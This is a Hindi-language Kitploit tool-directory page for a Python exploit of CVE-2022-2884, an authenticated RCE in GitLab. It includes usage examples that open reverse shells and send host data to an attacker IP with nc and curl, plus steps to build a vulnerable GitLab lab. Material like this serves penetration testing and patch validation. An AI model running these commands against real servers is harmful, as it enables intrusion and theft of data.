Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
gitlab_rce_cve-2022-2884 — Exploits GitLab प्रमाणित RCE भेद्यता CVE-2022-2884 का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/m3ssap0/gitlab_rce_cve-2022-2884
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubm3ssap0/gitlab_rce_cve-2022-2884

gitlab_rce_cve-2022-2884

Exploits GitLab प्रमाणित RCE भेद्यता CVE-2022-2884 का शोषण करता है।

रिपॉजिटरी देखें
2663 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

gitlab_rce_cve-2022-2884

यह एक Python3 प्रोग्राम है जो CVE-2022-2884 के नाम से ज्ञात GitLab प्रमाणित RCE कमजोरी का शोषण करता है।

अस्वीकरण

यह उपकरण सुरक्षा इंजीनियरों और एप्सेक लोगों के लिए सुरक्षा मूल्यांकन हेतु बनाया गया है। कृपया इस उपकरण का जिम्मेदारी से उपयोग करें। मैं इस एप्लिकेशन का उपयोग किसी भी व्यक्ति द्वारा किसी भी तरह से किए जाने की जिम्मेदारी नहीं लेता। मैं इस उपकरण के उपयोग से होने वाली किसी भी क्षति या किए गए किसी भी अपराध के लिए जिम्मेदार नहीं हूँ।

कमजोरी की जानकारी

  • CVE-ID: CVE-2022-2884
  • लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884
  • विवरण: GitLab CE/EE में एक कमजोरी जो 11.3.4 से लेकर 15.1.5 से पहले, 15.2 से 15.2.3, 15.3 से 15.3.1 तक के सभी संस्करणों को प्रभावित करती है, एक प्रमाणित उपयोगकर्ता को Import from GitHub API endpoint के माध्यम से रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती है।
  • विक्रेता लिंक: https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

सहायता

root@kitploit:~
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]

CVE-2022-2884 के नाम से ज्ञात GitLab प्रमाणित RCE कमजोरी के लिए शोषण। - v1.0 (2022-12-25)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the victim GitLab
  -pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
                        private token of GitLab
  -tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
                        target namespace of GitLab (default is 'root')
  -a ADDRESS, --address ADDRESS
                        IP address of the attacker machine
  -p PORT, --port PORT  TCP port of the attacker machine (default is 1337)
  -s, --https           set if the attacker machine is exposed via HTTPS
  -c COMMAND, --command COMMAND
                        the command to execute
  -d DELAY, --delay DELAY
                        seconds of delay to wait for the exploit to complete
  -v, --verbose         verbose mode

उदाहरण

root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"

संवेदनशील एप्लिकेशन

एक संवेदनशील एप्लिकेशन निम्नलिखित कमांड के साथ सेटअप किया जा सकता है।

root@kitploit:~
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
           --hostname gitlab.example.com \
           --publish 443:443 --publish 80:80 --publish 22:22 \
           --name vuln-gitlab \
           --volume $GITLAB_HOME/config:/etc/gitlab \
           --volume $GITLAB_HOME/logs:/var/log/gitlab \
           --volume $GITLAB_HOME/data:/var/opt/gitlab \
           --shm-size 256m \
           gitlab/gitlab-ce:15.3.0-ce.0

Docker कंटेनर को क्वेरी का जवाब देना शुरू करने में कुछ समय लग सकता है। फिर http://localhost से कनेक्ट करें।

उपयोगकर्ता नाम root और निम्नलिखित कमांड से पासवर्ड के साथ साइन इन करें।

root@kitploit:~
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password

स्थानीय रूप से शोषण का परीक्षण करने के लिए, आपको docker run कमांड में --network="host" जोड़ना होगा और GitLab पर आउटबाउंड अनुरोधों के लिए बाधाओं को हटाना होगा:

  • http://localhost/admin/application_settings/network पर कनेक्ट करें;
  • “आउटबाउंड अनुरोध” अनुभाग का विस्तार करें;
  • “वेब हुक और सेवाओं से स्थानीय नेटवर्क पर अनुरोधों की अनुमति दें” को चिह्नित करें;
  • 127.0.0.1 को “स्थानीय आईपी पते और डोमेन नाम जिन तक हुक और सेवाएं पहुंच सकती हैं” टेक्स्टबॉक्स में जोड़ें;
  • परिवर्तन सहेजें।

शोषण की पूर्व शर्त GitLab पर एक निजी टोकन होना है:

  • http://localhost/-/profile/personal_access_tokens पर कनेक्ट करें;
  • कम से कम api स्कोप वाला एक टोकन जनरेट करें।

लेखक

  • Antonio Francesco Sardella - मुख्य कार्यान्वयन - m3ssap0

लाइसेंस

विवरण के लिए LICENSE फ़ाइल देखें।

आभार

  • yvvdwf, वह सुरक्षा शोधकर्ता जिसने कमजोरी की खोज की।
टूल डाउनलोड करें